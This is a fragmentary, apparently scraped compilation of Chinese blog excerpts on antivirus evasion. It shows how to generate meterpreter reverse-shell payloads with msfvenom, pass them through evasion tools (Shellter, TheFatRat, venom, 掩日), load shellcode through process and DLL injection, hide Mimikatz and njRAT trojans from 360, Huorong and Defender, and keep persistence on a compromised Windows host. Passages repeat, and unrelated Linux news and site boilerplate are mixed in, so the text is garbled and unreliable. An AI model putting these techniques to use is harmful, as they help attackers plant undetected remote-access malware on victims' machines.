环境 攻击机: kali linux 10.211.55.23 受害机: Windows10 360主动防御 Windows7 火绒主动防御 2....生成exe文件 在kali linux下使用msfvenom生成一个64位的exe文件 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.211.55.23...lport=4444 -f exe -o 1.exe 将文件分别发送至Windows10上,此时需要将受害者的机器关闭全部杀软 使用掩日3.0进行免杀处理(这里会提示报错,需要安装一个软件,按照提示安装即可...静态测试 打开各自的杀软进行测试 3.1 360 均报毒 3.2 火绒 只有一个文件报毒 4....总结 总体上来说,这款免杀工具已经是非常强了,而且公开了这么久,还支持部分免杀,很厉害了!
官方文档 在制作免杀的过程中,翻找 Windows 官方对 Windows Defender 的介绍,发现有这样一个目录:Configure Microsoft Defender Antivirus exclusions...on Windows Server(在 Windows server 中配置defender排除项)。...简而言之就是在 Windows Server2016 和 2019 中,Windows Defender 默认存在一些排除项,在实时检测过程中会忽略这些排除项,但是主动扫描的时候不会排除。...这就给 Bypass Windows Defender 提供了一个新思路。...实例 以最后一个 php-cgi.exe 为例,默认在 Windows Server 2019 中是没有此路径的,所以在实际使用过程中需新建此目录。
virustotal.com 中 44/71 个报毒 ? 虽然查杀率还比较高,不过火绒和 360 都能静态+动态免杀。...Shellter 安装非常简单,使用也非常便捷,而且生成的 payload 免杀效果也都比较好,windows 和 linux 下都可以使用,实在是居家旅行必备良药。...TheFatRat 创建的后门或者 payload,可以在 Linux,Windows,Mac 和 Android 上等多种平台上执行,可生成 exe、apk、sh、bat、py 等多种格式。...Green-Hat-Suite 也是和 msf 无缝对接的免杀工具,使用 ruby 开发,可在 linux/windows 上安装,使用非常简单,虽然已经接近两年没有更新了,但目前来看免杀效果仍然很不错...Mono 可以让.NET 程序跨平台运行在 Linux,BSD,Windows,MacOS,Sun Solaris,Wii, 索尼 PlayStation, 苹果 iPhone 等几乎所有常见的操作系统之上
++还要复杂,在 C/C++中可以直接调用 Windows API,在 Python 中则要通过一层转化间接调用 Windows API,而且 Python 打包的程序报毒比较高,体积比较大。...CS、MSF 是使用最多的远控,CS 功能丰富还有图形页面,支持多人协作,可以通过 c2profile 文件修改流量特征,但是 CS 对 linux 的支持不友好,很多功能依赖进程注入,容易被杀软拦截,...在线查杀环境中个别杀软只要你没有正规签名不管三七二十一就报毒或是报毒误差比较大的不具备参考价值,如果不是为了装比,一般只要能静态免杀前面说到的几个杀软就足够了,上传到在线查杀网站的意义不大还有可能提前暴露...不同编译器编译后的代码不同,报毒情况也不相同,有的编译器编译的 exe 在 VT 上的报毒比较高,如 v143 编译器编译的空包 exe 通常有几十个报毒,而有的编译器编译的 exe 在 VT 上的报毒比较低...,可以自己尝试一下那种编译器报毒比较低,选一个报毒低的编译器来编译。
我在执行安装中,遇到了几个坑,其中遇到zenity报错信息,翻遍了官方Github也没找到解决办法,报错信息如下: zenity: relocation error: /usr/lib/x86_64-linux-gnu...然后选择windows,也就是2 ? 然后会列出所有windows可用的20个agent ?...virustotal.com中19/71个报毒 ? venom生成dll(VT查杀率11/70) 我们再试一下其他模块的免杀效果,选择windows之后,在agent中选择第1个,生成dll ?...virustotal.com中11/70个报毒,过了微软和卡巴了~ ?...小结 venom是一个综合性非常强大的工具,而且支持生成多平台payload,比如android、ios、linux/unix、office等等,我这里也只是简单演示了windows下的两个agent
生成exe(VT查杀率42/71) 使用use windows/windows_defender_exe进行生成payload ? 不打开杀软的情况下,可正常上线 ?...打开杀软,目前已经无法过360和火绒,看网上资料在该模块刚出来时是可以过360的。 ? virustotal.com中42/71个报毒(前几天测试的时候还是39个...) ?...生成hta(VT查杀率14/59) 用另外一个evasion模块windows/windows_defender_js_hta生成一下,360同样被杀 ?...virustotal.com中14/59个报毒,不过在线查毒时显示360也没查出来,但我本地测试时却是能查出来的,所以在线查杀还是不太精准的。 ?...静态查杀都没有问题,执行时360行为查杀会报毒。 ? 在virustotal.com中对install_util.exe进行查杀,发现12/71个报毒 ?
/Desktop/1.c (二)通过远程线程注入加载payload 通过VS2019对payload进行处理: 编译生成Project1.exe,将其传入装有360和火绒的Windows靶机进行免杀测试...(三)检测免杀 在Kali上开启msf监听 在靶机上运行Project1.exe,Kali机器获取到Session,并且360和火绒均未报毒 二、DLL注入 (一)通过DLL注入加载Payload...在Kali机器上开启msf监听 开启calc.exe,获取其PID信息 运行Project1.exe,Kali机器获取到Session,且火绒和360未报毒 三、Shellcode加载器 (一)...python运行加载器 将python脚本中的shellcode部分改为msf生成的payload (二)检测免杀 Kali机器开启监听 在Windows学员机环境下运行python加载器,kali...获取到session,且360和火绒均未报毒,第一次失败是由于配置shellcode时多打了一个字符导致出错。
下载之后本地打开:(记得关闭杀软) 2....360主动防御 • Windows7 火绒主动防御 • Windows10 开启windows Defender 其中测试的杀软均升级到最新,并且关闭了自动上传样本的功能。...(被杀) 在上线之后,立刻被拦截查杀: 在这里可以发现,三个杀软中只有Windows Defender难过,因此针对它进一步进行测试: 在这里选择了加密方法,然后再去生成木马,但是发现过Windows...此时生成了两个文件: 静态查杀正常: 动态加载: 动态加载的话,不是直接双击上线的,而是在命令行中,将exe加载,并且跟上分离文件的名称才可以:(此时没有杀软) 当有Windows Defender...总结 在整个掩日免杀项目中,可以看到功能比以前增加了很多,而且体验感变好,免杀能力也很强。
靶机进行免杀测试。...(三)检测免杀 在Kali上开启msf监听 在靶机上运行Project1.exe,Kali机器获取到Session,并且360和火绒均未报毒 二、DLL注入 (一)通过DLL注入加载Payload...在Kali机器上开启msf监听 开启calc.exe,获取其PID信息 运行Project1.exe,Kali机器获取到Session,且火绒和360未报毒 三、Shellcode加载器 (一)...python运行加载器 将python脚本中的shellcode部分改为msf生成的payload (二)检测免杀 Kali机器开启监听 在Windows学员机环境下运行python加载器,kali...获取到session,且360和火绒均未报毒,第一次失败是由于配置shellcode时多打了一个字符导致出错。
过程 当我导入recon信息收集模块的时候,windows defender 报毒了,给我阻止了 ?...按照以往的查找特征码手法,是挨个文件试,结果被我发现是powerview.ps1这个脚本被windows defender报毒,范围进一步缩小。...然后就开始免杀windows defender的尝试,我开始把一些脚本里的特征字符,多余的字符,比如什么介绍,注释什么的都删掉,删掉了一部分 再次尝试导入: ?...依然失败,我把windows defender 来直接扫描文件,没有报毒,说明静态过了的,那肯定是动态行为没过。...果然还是得用杀软对抗杀软!简直tql 然后我想着,这上来就给人家安装个杀软,动静多大啊!我有那么好心? 然后我继续删删减减,然后我直接跳到最后,加换行符。 ? 加了一些,然后继续,依然被拦 ?
Windows权限维持 目录 定时任务 创建隐蔽账号 进程迁移 启动目录 注册服务自启(报毒) 修改注册表实现自启动 在红蓝对抗实战中,当我们获取到一台Windows主机的权限后,首先要做的就是怎么维持住该权限...但是如果目标主机有杀软的话会报毒 所以,要想绕过杀入软件创建计划任务的话,有这么一个思路。利用VBS脚本创建计划任务,然后执行该VBS脚本即可。实测不报毒。...注意,如果目标主机上有杀软的话,创建新用户杀软会有安全提示的。...我们将免杀马放在 c:\windows\temp 目录下,免杀马的名字改为 run.exe @echo off set INTERVAL=120 :Again echo start server...\Start Menu\Programs\Startup 注意,如果目标主机上有杀软的话,将木马放入启动目录杀软会有安全提示的。
Linux 之父、黑客、开源倡导者?Linus Torvalds 一直坚持在技术第一线,开发了 Linux 和 Git 两个项目,并深刻影响了软件行业。...如果没有 Linux,就不会有基于 Linux 的安卓系统,那世界是怎样的?如果没有 Git 的诞生,就不会基于 Git 的 GitHub,那么开源的盛行会迟来多久。...Spectre漏洞阴影余波荡漾,Linux操作系统安装修复程序后频频出包。...Linux之父LinuxTorvalds周一在Linux群组论坛公开炮轰,英特尔提供给Linux的Spectre修复程序是完全无用的垃圾(completeanduttergarbage)。...“2014年3月6日 虽然 Linus Torvalds 的毒舌,语不惊人不罢休的个性在业内大家早已知晓,但大多数情况下,Torvalds 愤怒的主要原因都是技术惹的祸,跟技术有关,并非是没有理由的,而且不可否认的是
前段时间分享了在线杀软对比源码+数据源(自用),最近又做了些补充,新增了一些杀软和常用的权限提升、信息搜集的进程。欢迎大家补充!...所以搜集整理了下Windows常用到的杀软、提权、信息搜集的进程用于辅助渗透。...奇安信、深信服、火绒安全、电脑管家等; WPS、G6FTP、TeamViewer、ToDesk、AnyDesk、向日葵、护卫神主机卫士、西部数码建站助手等; 注:如果存在有安全防护则需要去做针对性的免杀和绕过测试
2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。...4、其他杀软的检测指标是在virustotal.com(简称VT)上在线查杀,所以可能只是代表了静态查杀能力,数据仅供参考,不足以作为免杀的精确判断指标。...5、完全不必要苛求一种免杀技术能bypass所有杀软,这样的技术肯定是有的,只是没被公开,一旦公开第二天就能被杀了,其实我们只要能bypass目标主机上的杀软就足够了。...Mono可以让.NET程序跨平台运行在Linux,BSD,Windows,MacOS,Sun Solaris,Wii,索尼PlayStation,苹果iPhone等几乎所有常见的操作系统之上。...virustotal.com中39/71个报毒,以为能过360和火绒,免杀应该不错的... ?
2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。...2、ubuntu系统中apt安装 3、手动下载windows版 官方下载站点https://www.shellterproject.com/download/ 下载后解压,无需安装,cmd下可直接使用...还是选择windows/meterpreter/reverse_tcp作为payload ?...virustotal.com中7/69个报毒,卡巴、瑞星、微软三个都没bypass。。 ?...小结 Shellter安装非常简单,使用也非常便捷,而且生成的payload免杀效果也都比较好,windows和linux下都可以使用,实在是居家旅行、**灭口必备良药。
一 前言 尝试对Mimikatz进行免杀,提取Mimikatz的shellcode,然后使用免杀的加载器进行加载,用加载器在加载cs shellcode时免杀效果挺好,但在加载Mimikatz的shellcode...发现直接被360、defender等静态查杀了,VT上报毒也很高,于是尝试找出问题并进行免杀。...于是我先进行了实验,在exe资源中存放一张大小差不多的正常的图像,上传VT测试,发现报毒并没有降低,于是将该方法pass掉。 2....由于Mimikatz经常被用在windows server之中,vs默认的编译配置只能在windows server 2016及以上的版本中运行,在windows server 2012及以下版本中运行会提示如下的各种...100到200KB,exe达到效果图中的1.7MB,同时VT报毒也会少量增加,这就需要通过其它的一些调试减少报毒了。
3.Windows Defender免杀更不用想,秒杀! 2.2 其他方法成功 免杀火绒成功 免杀Windows Defender(关闭自动上传可疑样本)成功 360不进行测试,联网无意义!...说明 机器1:Windows10 编辑环境:vs2012 杀软:360安全卫士联网最新版(带安全大脑,会自动上传样本) 机器2:Windows7 杀软:火绒联网最新版 机器3:Windows10 杀软:...,而且当右键运行mimikatz的时候,直接弹出警告信息: 再次双击运行的时候,直接报毒!...在这里发现了病毒,查阅日志发现,大概2分钟之后开始报毒!...6.5.1 火绒 6.5.2 360杀毒(联网版) 等一段时间再看下: 大概1分钟之后,报毒!
大概2分钟之后,360报毒 关闭所有的杀毒之后,分别在win10和winserver2019上运行正常,win7本地运行报错 从网上查到了相关的资料: failed to execute script...当然,在无防护下,理论上所有木马均可上线 3. shellcode免杀 这里以Windows7下的火绒为例 完整版: # -*- encoding: utf-8 -*- # Time : 2021/.../gui/file/a278c36a24c7315a0d8d7f8c1adf2a4ac927b25f72aca330fdb7ea77be86ac48/detection 接下来就是不能免杀的: windows...总结 本文使用了最基本的shellcode加载器免杀的方法,而且一起学习了pyinstaller打包exe的反编译方式,也顺便免杀了火绒、360、Windows Defender,当然从该文章发出来的那一刻起...,可能免杀就不再有效了,不过,方法千千万,免杀没有那么难。
实验环境 攻击机: win7 IP: 192.168.32.134 靶机: windows server 2012(安装360、火绒) IP: 192.168.32.133 一、生成客户端exe木马...njRAT生产一个客户端exe木马 输入回连端口号8888,点击start 配置客户端木马的回连地址:192.168.32.134 将文件保存在桌面 开启360杀毒,直接报毒,...不免杀 二、对客户端exe木马使用加解密替换方法进行免杀 1、将生成的客户端木马:Server.exe在 Encryption Tool V3.0中以base64加密方式打开 打开之后,...,并且开启杀软进行查杀,均未报毒,成功免杀 在靶机中双击免杀的客户端exe文件:CsharpEncryptionDecryptor.exe 在win7电脑上查看,发现靶机成功上线...以此绕过免杀 发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/171489.html原文链接:https://javaforall.cn
,defender直接查杀 电脑管家没报毒(轻松绕过,后面可以直接关闭,无视它了) msf开启监听: use exploit/multi/handler set payload windows/meterpreter...惊呆了 点击执行,测试机器2成功上线并能执行命令 本机火绒没杀,扫描时报毒,扫描界面开启时,点击程序并不能执行,但将扫描界面关闭,再点能成功上线并执行命令。...这教育我们别自己作,如果下载的破解版软件用杀软扫描报毒,别再运行了,除非你想当肉鸡(狗头) windows defender没查杀,运行后上线,但随后连接被断开,且defender自动将程序杀掉,强,...: 测试机器3上扫描没报毒,拖到测试机器2上提示这个,点击允许,360扫描ms2.exe没报毒 有点奇怪,之前实验时没报这个。...,报毒也要安装的话,也会成功上线,如果不执行添加用户这样的敏感操作的话,360也不会提示,在这点上倒是win10自带的defender更强大。
领取专属 10元无门槛券
手把手带您无忧上云